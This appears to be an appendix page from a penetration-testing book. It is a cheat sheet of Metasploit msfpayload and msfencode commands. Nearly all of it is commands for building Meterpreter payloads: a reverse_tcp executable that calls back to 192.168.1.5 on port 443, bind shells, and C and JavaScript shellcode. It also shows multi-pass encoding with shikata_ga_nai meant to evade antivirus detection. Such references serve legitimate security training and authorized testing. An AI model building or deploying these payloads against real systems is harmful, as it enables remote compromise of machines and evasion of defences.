280
Appendix B
MSFpayload Commands
msfpayload -h
List available payloads.
msfpayload windows/meterpreter/bind_tcp O
List available options for the
windows/meterpreter/bind_tcp
payload (all of
these can use any payload).
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X >
payload.exe
Create a Meterpreter
reverse_tcp
payload to connect back to 192.168.1.5
and on port 443, and then save it as a Windows Portable Executable
named
payload.exe
.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R >
payload.raw
Same as above, but export as raw format. This will be used later in
msfencode
.
msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
Same as above but export as C-formatted shellcode.
msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
Export as
%u encoded
JavaScript.
MSFencode Commands
msfencode -h
Display the
msfencode
help.
msfencode -l
List the available encoders.
msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs,
loop-vbs, asp, war, macho)
Format to display the encoded buffer.
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5
-t exe
Encode
payload.raw
with
shikata_ga_nai
five times and export it to an
output file named
encoded_payload.exe
.
msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/
_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o
multi-encoded_payload.exe
Create a multi-encoded payload.
msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
Create pure alphanumeric shellcode where ESI points to the shellcode;
output in C-style notation.